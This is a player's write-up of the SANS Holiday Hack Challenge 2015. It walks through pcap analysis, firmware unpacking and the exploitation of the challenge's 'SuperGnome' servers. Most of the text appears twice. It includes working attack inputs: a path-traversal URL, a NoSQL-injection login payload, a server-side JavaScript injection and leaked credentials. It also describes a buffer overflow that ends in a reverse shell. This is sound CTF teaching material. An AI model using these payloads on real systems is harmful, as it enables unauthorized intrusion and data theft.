Holiday Hack Challenge 2015 Writeup
Hey All! The following is my Challenges write-up for Holiday Hack 2015, submitted by quest player 'ahhh'! It all started with the interactive 'quest' mode. First thing I did was fully explore this, reading what every character had to say and bookmarking all of the links for later. I also completed all of the quest based tasks before moving on to the following set of Challenge questions. You can see that, mostly nontechnical endeavors are in the quest game, which was covered in my previous Holiday Hack Quest post. The following deals with the technical challenges, the challenges write-up and my SANs final submission:
After acquiring the pcap and analyzing it in Wireshark, it became clear they were using the the DNS txt field as a covert channel to hide data. I then extracted the base64 from the DNS txt field using tshark, getting the exact field by highlighting in Wireshark first:
1A) Decoding these base64 commands reveals a custom RAT protocol, which is issuing shell commands such as iwconfig and also reads a file that gather wireless information about the RAT's environment. These commands are followed by a FILE command, which initiates a file transfer.
2) What image appears in the photo the Gnome sent across the channel from the Dosis home?
Running the scapy script provided to us in the quest game, it produces a dump of the FILE transfer command's payload. This data dump still has some parts of the RAT's custom file transfer protocol in it though, so we then carve some initial ASCII data off of the start and end of the file. Here we can just carve the jpeg out of the binary blob, trimming off all the data up to FFD8 and all of the data after FFD9, in a hex editor.
2A) The photo we then reveal is a webcam photo from the gnome device in a home, spying on a room in the house, with the flag in the bottom of the photo, which reads: GnomeNET-NorthAmerica
Start by opening the filesystem with squashfs-tools, using:
Then we find a linux file system, and several interesting details:
Ambarella S2Lm IP Camera Processor System-on-Chip
ARM Cortex A9 CPU
32-bit, ARM, EABI5 version 1
OpenWRT r47650
3A) 32-bit, ARM, EABI5 version 1 running OpenWRT r47650 on an Ambarella S2Lm IP Camera Processor System-on-Chip. The web application is written in NodeJS, with numerous node_modules, and leverages a Mongo Database. The 'Gnome firmware' is: GnomeIYH v1.1.8.164461
Gnome Serial Number: 20-RNG9731
4) What kind of a database engine is used to support the Gnome web interface? What is the plaintext password stored in the Gnome database?
4A) MongoDB, password to mongodb is KTt9C1SljNKDiobKKro926frc. (same across others as well, after using LFI on SG02)
The passwords in MongoDB are in: opt/mongodb/gnome.0
We can read these using:
and then we get the username 'admin' and password 'SittingOnAShelf'
Here we can use Shodan to search for specific header values in the banner of the firmware we analyzed: https://www.shodan.io/search?query=SuperGnome
5A)
SG1 - 52.2.229.189
SG2 - 52.34.3.80
SG3 - 52.64.191.71
SG4 - 52.192.152.132
SG5 - 54.233.105.81
Also of interest, the hostnames: supergnome1.atnascorp.com, sg1.atnascorp.com, supergnome.atnascorp.com, sg.atnascorp.com
6) Where is each SuperGnome located geographically?
6A) While they have various locations around the world, but they are all hosted on Amazon so this would be the best avenue for access
SG1 - Ashburn, United States - Amazon
https://www.shodan.io/host/52.2.229.189
SG2 - Boardman, United States - Amazon
https://www.shodan.io/host/52.34.3.80
SG3 - Sydney, Austrilia - Amazon
https://www.shodan.io/host/52.64.191.71
SG4 - Tokyo, Japan - Amazon
https://www.shodan.io/host/52.192.152.132
SG5 - Brazil - Amazon
https://www.shodan.io/host/54.233.105.81
7A) Aside from looting the firmware for credentials, which we then found to be valid on other Gnome devices, the NodeJS web application had several notible vulnerabilities:
7A.1) MongoDB NoSQL injection in the login page. This can be found in the LOGIN POST function in 'index.js'.
7A.2) The Camera Viewer function in 'index.js' is vulnerable to Local File Inclusion
7A.3) The FILE UPLOAD function in 'index.js' is vulnerable to server side javascript command injection
7A.4) The SETTINGS UPLOAD function can be abused to create arbitrary directories and leak file location information on the server
8) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN IN THE DOSIS NEIGHBORHOOD, attempt to remotely exploit each of the SuperGnomes. Describe the technique you used to gain access to each SuperGnome’s gnome.conf file.
8A)
SG01 - We can login with default creds found in the previous MongoDB named gnome.0:
Gnome Serial Number: NCC1701
The key exploit details here are using the following credentials:
admin:SittingOnAShelf
http://52.2.229.189/files
SG02 - Create an arbitrary directory named .png and use Local File Inclusion in CAM to traverse through that directory and then to files of our choosing:
Gnome Serial Number: XKCD988
The key exploit details here are:
First create a new file in settings called:
Then browse to:
SG03 - NOSQLI in Login, when sending a POST to http://52.64.191.71/
Gnome Serial Number: THX1138
The key exploit details here is setting the following in your POST request:
SG04 - Server Side JavaScript Injection vuln in File Upload in http://52.192.152.132/:
Gnome Serial Number: BU22_1729_2716057
JS injection, started with simple tests like replacing the function call w/ "2+2"
The key exploit details here is calling the following in your request:
SG05 - Buffer Overflow in sgnet program listening on port 4242 of 54.233.105.81
Gnome Serial Number: 4CKL3R43V4
Connect to 4242. Buffer overflow w/ stack execution and a stack canary.
Analyzing the source code they provide reveals a secret menu option, which is vulnerable to a buffer overflow, can also edit this code and rebuild the binary, to get around anti-debugging code easier.
I decided to debug the server using peda-gdb and write my client using pwntools.
Key details require following the child process by calling the following:
(gdb) set follow-fork-mode child
(gdb) break sgnet_readn
Then we find our canary location in the exploit, as well as where we overwrite EIP.
Next we need to get a rop gaget to jmp esp!
Finally we add a reverse tcp shellcode
and boom! reverse shell action :D running as unprivileged user nobody! I've included my exploit below for those want to see the code: https://gist.github.com/ahhh/c1a281f676c6a1892f95.js
9A)
Based on the various emails and attachments found in the network transmissions found on each of the SuperGnomes, the plot of the ATNAS group, and the purpose of the GnomeInYourHome devices became clear. The GnomeInYourHome toys are being planted in multiple houses to give thieves and crooks an internal audio / video feed of their potential future victims. In this way they can use the remote spying devices to locate the valuable targets and determine the best courses of action before ever setting foot onsite.
10) Who is the villain behind the nefarious plot?
10A)
Wooow, **spoiler alert**, 'Cindy Lue Who' is using The ATNAS Corporation and Super Gnome jump boxes to let crooks spy on individuals and then conspiring with the thieves, they plan to break into the houses of victims on Christmas eve. dressed in Santa costumes to steal presents from little kids! Cindy is caring this out doing this to ruin Christmas and continue the Grinch's life work. Which is even sadder, as we learn on the final super gnome that the Grinch wrote Cindy Lue to apologize. This is a twisted Christmas plot..
For the full details extract the emails out of the network transfers from the various SuperGnome servers.
Part 1: Dance of the Sugar Gnome Fairies: Curious Wireless Packets
1) Which commands are sent across the Gnome’s command-and-control channel?After acquiring the pcap and analyzing it in Wireshark, it became clear they were using the the DNS txt field as a covert channel to hide data. I then extracted the base64 from the DNS txt field using tshark, getting the exact field by highlighting in Wireshark first:
tshark.exe -r giyh-capture.pcap -O DNS -Y "dns.flags.response == 1" -T fields -e dns.txt1A) Decoding these base64 commands reveals a custom RAT protocol, which is issuing shell commands such as iwconfig and also reads a file that gather wireless information about the RAT's environment. These commands are followed by a FILE command, which initiates a file transfer.
2) What image appears in the photo the Gnome sent across the channel from the Dosis home?
Running the scapy script provided to us in the quest game, it produces a dump of the FILE transfer command's payload. This data dump still has some parts of the RAT's custom file transfer protocol in it though, so we then carve some initial ASCII data off of the start and end of the file. Here we can just carve the jpeg out of the binary blob, trimming off all the data up to FFD8 and all of the data after FFD9, in a hex editor.
2A) The photo we then reveal is a webcam photo from the gnome device in a home, spying on a room in the house, with the flag in the bottom of the photo, which reads: GnomeNET-NorthAmerica
Part 2: I’ll be Gnome for Christmas: Firmware Analysis for Fun and Profit
3) What operating system and CPU type are used in the Gnome? What type of web framework is the Gnome web interface built in?Start by opening the filesystem with squashfs-tools, using:
unsquashfs giyh-firmware-dump.binThen we find a linux file system, and several interesting details:
Ambarella S2Lm IP Camera Processor System-on-Chip
ARM Cortex A9 CPU
file sbin/sysctl32-bit, ARM, EABI5 version 1
cat etc/openwrt_releaseOpenWRT r47650
3A) 32-bit, ARM, EABI5 version 1 running OpenWRT r47650 on an Ambarella S2Lm IP Camera Processor System-on-Chip. The web application is written in NodeJS, with numerous node_modules, and leverages a Mongo Database. The 'Gnome firmware' is: GnomeIYH v1.1.8.164461
Gnome Serial Number: 20-RNG9731
4) What kind of a database engine is used to support the Gnome web interface? What is the plaintext password stored in the Gnome database?
4A) MongoDB, password to mongodb is KTt9C1SljNKDiobKKro926frc. (same across others as well, after using LFI on SG02)
The passwords in MongoDB are in: opt/mongodb/gnome.0
We can read these using:
mongodump --dbpath opt/mongodb/; bsondump dump/gnome/users.bsonand then we get the username 'admin' and password 'SittingOnAShelf'
Part 3: Let it Gnome! Let it Gnome! Let it Gnome! Internet-Wide Scavenger Hunt
5) What are the IP addresses of the five SuperGnomes scattered around the world, as verified by Tom Hessman in the Dosis neighborhood?Here we can use Shodan to search for specific header values in the banner of the firmware we analyzed: https://www.shodan.io/search?query=SuperGnome
5A)
SG1 - 52.2.229.189
SG2 - 52.34.3.80
SG3 - 52.64.191.71
SG4 - 52.192.152.132
SG5 - 54.233.105.81
Also of interest, the hostnames: supergnome1.atnascorp.com, sg1.atnascorp.com, supergnome.atnascorp.com, sg.atnascorp.com
6) Where is each SuperGnome located geographically?
6A) While they have various locations around the world, but they are all hosted on Amazon so this would be the best avenue for access
SG1 - Ashburn, United States - Amazon
https://www.shodan.io/host/52.2.229.189
SG2 - Boardman, United States - Amazon
https://www.shodan.io/host/52.34.3.80
SG3 - Sydney, Austrilia - Amazon
https://www.shodan.io/host/52.64.191.71
SG4 - Tokyo, Japan - Amazon
https://www.shodan.io/host/52.192.152.132
SG5 - Brazil - Amazon
https://www.shodan.io/host/54.233.105.81
Part 4: There’s No Place Like Gnome for the Holidays: Gnomage Pwnage
7) Please describe the vulnerabilities you discovered in the Gnome firmware.7A) Aside from looting the firmware for credentials, which we then found to be valid on other Gnome devices, the NodeJS web application had several notible vulnerabilities:
7A.1) MongoDB NoSQL injection in the login page. This can be found in the LOGIN POST function in 'index.js'.
7A.2) The Camera Viewer function in 'index.js' is vulnerable to Local File Inclusion
7A.3) The FILE UPLOAD function in 'index.js' is vulnerable to server side javascript command injection
7A.4) The SETTINGS UPLOAD function can be abused to create arbitrary directories and leak file location information on the server
8) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN IN THE DOSIS NEIGHBORHOOD, attempt to remotely exploit each of the SuperGnomes. Describe the technique you used to gain access to each SuperGnome’s gnome.conf file.
8A)
SG01 - We can login with default creds found in the previous MongoDB named gnome.0:
Gnome Serial Number: NCC1701
The key exploit details here are using the following credentials:
admin:SittingOnAShelf
http://52.2.229.189/files
SG02 - Create an arbitrary directory named .png and use Local File Inclusion in CAM to traverse through that directory and then to files of our choosing:
Gnome Serial Number: XKCD988
The key exploit details here are:
First create a new file in settings called:
.png/lol.lolThen browse to:
http://52.34.3.80/cam?camera=../upload/sGfdbXhO/.png/../../../../files/factory_cam_2.zipSG03 - NOSQLI in Login, when sending a POST to http://52.64.191.71/
Gnome Serial Number: THX1138
The key exploit details here is setting the following in your POST request:
Content-Type:application/json
{
"username": "admin",
"password": {"$gt": ""}
}SG04 - Server Side JavaScript Injection vuln in File Upload in http://52.192.152.132/:
Gnome Serial Number: BU22_1729_2716057
JS injection, started with simple tests like replacing the function call w/ "2+2"
The key exploit details here is calling the following in your request:
fs.readFileSync('.files/gnome.gonf')SG05 - Buffer Overflow in sgnet program listening on port 4242 of 54.233.105.81
Gnome Serial Number: 4CKL3R43V4
Connect to 4242. Buffer overflow w/ stack execution and a stack canary.
Analyzing the source code they provide reveals a secret menu option, which is vulnerable to a buffer overflow, can also edit this code and rebuild the binary, to get around anti-debugging code easier.
I decided to debug the server using peda-gdb and write my client using pwntools.
Key details require following the child process by calling the following:
(gdb) set follow-fork-mode child
(gdb) break sgnet_readn
Then we find our canary location in the exploit, as well as where we overwrite EIP.
Next we need to get a rop gaget to jmp esp!
Finally we add a reverse tcp shellcode
and boom! reverse shell action :D running as unprivileged user nobody! I've included my exploit below for those want to see the code: https://gist.github.com/ahhh/c1a281f676c6a1892f95.js
Part 5: Baby, It’s Gnome Outside: Sinister Plot and Attribution
9) Based on evidence you recover from the SuperGnomes’ packet capture ZIP files and any staticky images you find, what is the nefarious plot of ATNAS Corporation?9A)
Based on the various emails and attachments found in the network transmissions found on each of the SuperGnomes, the plot of the ATNAS group, and the purpose of the GnomeInYourHome devices became clear. The GnomeInYourHome toys are being planted in multiple houses to give thieves and crooks an internal audio / video feed of their potential future victims. In this way they can use the remote spying devices to locate the valuable targets and determine the best courses of action before ever setting foot onsite.
10) Who is the villain behind the nefarious plot?
10A)
Wooow, **spoiler alert**, 'Cindy Lue Who' is using The ATNAS Corporation and Super Gnome jump boxes to let crooks spy on individuals and then conspiring with the thieves, they plan to break into the houses of victims on Christmas eve. dressed in Santa costumes to steal presents from little kids! Cindy is caring this out doing this to ruin Christmas and continue the Grinch's life work. Which is even sadder, as we learn on the final super gnome that the Grinch wrote Cindy Lue to apologize. This is a twisted Christmas plot..
For the full details extract the emails out of the network transfers from the various SuperGnome servers.
And that's it ladies and gents! As you've probably seen, there a bunch of these writeups out there, however if you are looking for a more detailed explanation of each step I would recommend my friend Joe's writeup, which is detailed and easy to digest!